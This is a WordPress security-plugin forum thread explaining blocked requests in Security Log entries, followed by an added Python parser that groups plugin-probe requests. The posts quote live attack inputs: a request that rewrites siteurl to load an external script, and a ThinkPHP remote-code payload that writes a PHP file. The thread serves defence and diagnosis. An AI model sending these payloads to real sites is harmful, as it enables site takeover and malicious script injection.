Security Log Event Codes
Tagged: Event Codes, Security Log
This topic has 81 replies, 17 voices, and was last updated 4 months, 1 week ago by Chris Moon.
Bub
Participant
Done and done…. Thanks. This topic should now be closed.
Bub
Participant
Again, thanks.
sergeykar
Participant
I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing its job – however is there a weakness this attempt is trying to exploit?
[403 GET Request: 06.08.2019 - 10:15] BPS: 3.5 WP: 5.2.2 Event Code: WPADMIN-SBR Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: 159.69.154.78 Host Name: static.78.154.69.159.clients.your-server.de SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: HTTP_FORWARDED: HTTP_X_FORWARDED_FOR: HTTP_X_CLUSTER_CLIENT_IP: REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option] QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option] HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
AITpro Admin
Keymaster
This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code. To check if your website is hacked do the steps below:
1. Go to your website’s home page.
2. Right mouse click and click View page source (Google Chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (Google Chrome – located under settings > Find…) and enter this search string: nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.
httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
Chris Moon
Participant
Found this in my Security Log and not sure what it means:
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php QUERY_STRING: HTTP_USER_AGENT: Mozilla
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php QUERY_STRING: HTTP_USER_AGENT: Mozilla
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php QUERY_STRING: HTTP_USER_AGENT: Mozilla
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php QUERY_STRING: HTTP_USER_AGENT: Mozilla
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php QUERY_STRING: HTTP_USER_AGENT: Mozilla
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js QUERY_STRING: HTTP_USER_AGENT: Mozilla
AITpro Admin
Keymaster
@ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities. The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder. So these recons/searches were blocked by the BPS Pro Plugin Firewall.
Chris Moon
Participant
Thanks Ed, that’s reassuring.
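Added example, not part of the thread and not BulletProof Security code: a Python parser that splits run-together Security Log text like the entries quoted above into fields, then groups blocked plugin-file requests by Host Name and timestamp so a recon sweep such as the one discussed shows up as one finding. It groups on Host Name because REMOTE_ADDR can read "GDPR Compliance On", as in the entries above. The field labels are taken from those entries; the function names, the threshold of three paths, and the sample hosts and paths are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Field labels exactly as they appear in the entries quoted in this thread.
LABELS = ["BPS Pro", "BPS", "WP", "Event Code", "Solution", "REMOTE_ADDR",
          "Host Name", "SERVER_PROTOCOL", "HTTP_CLIENT_IP", "HTTP_FORWARDED",
          "HTTP_X_FORWARDED_FOR", "HTTP_X_CLUSTER_CLIENT_IP", "REQUEST_METHOD",
          "HTTP_REFERER", "REQUEST_URI", "QUERY_STRING", "HTTP_USER_AGENT"]
LABEL_RE = re.compile(r"\s(" + "|".join(map(re.escape, LABELS)) + r"):")
HEADER_RE = re.compile(r"\[(\d{3}) ([A-Z]+) Request: ([^\]]+)\]")

def parse_entries(text):
    """Split run-together log text into one dict of fields per entry."""
    entries = []
    for chunk in re.split(r"(?=\[\d{3} [A-Z]+ Request: )", text):
        chunk = chunk.strip()
        head = HEADER_RE.match(chunk)
        if not head:
            continue
        entry = {"status": head.group(1), "when": head.group(3)}
        marks = list(LABEL_RE.finditer(chunk, head.end()))
        for cur, nxt in zip(marks, marks[1:] + [None]):
            value = chunk[cur.end():nxt.start() if nxt else len(chunk)]
            # setdefault: a label repeated inside request data cannot
            # overwrite a field that was already parsed.
            entry.setdefault(cur.group(1), value.strip())
        entries.append(entry)
    return entries

def find_plugin_sweeps(entries, min_paths=3):
    """Map (host name, timestamp) to the distinct plugin paths blocked with
    a 403, for sources that requested at least min_paths of them."""
    seen = defaultdict(set)
    for e in entries:
        uri = e.get("REQUEST_URI", "")
        if e["status"] == "403" and uri.startswith("/wp-content/plugins/"):
            seen[(e.get("Host Name", ""), e["when"])].add(uri)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_paths}

# Constructed sample, abbreviated to a few fields; all values are placeholders.
TEMPLATE = ("[403 GET Request: January 1, 2021 - 12:00] BPS Pro: 0.0 WP: 0.0 "
            "Event Code: PFWR-PSBR-HPRA REMOTE_ADDR: GDPR Compliance On "
            "Host Name: {host} HTTP_CLIENT_IP: REQUEST_METHOD: GET "
            "REQUEST_URI: {uri} QUERY_STRING: HTTP_USER_AGENT: Mozilla ")
SAMPLE = "".join(TEMPLATE.format(host=h, uri=u) for h, u in [
    ("scanner.example.net", "/wp-content/plugins/example-a/a.php"),
    ("scanner.example.net", "/wp-content/plugins/example-a/b.php"),
    ("scanner.example.net", "/wp-content/plugins/example-b/c.js"),
    ("other.example.org", "/wp-content/plugins/example-a/a.php")])
```

Calling `find_plugin_sweeps(parse_entries(SAMPLE))` reports only the host that requested three distinct plugin paths in the same minute; the single request from the other host stays below the threshold.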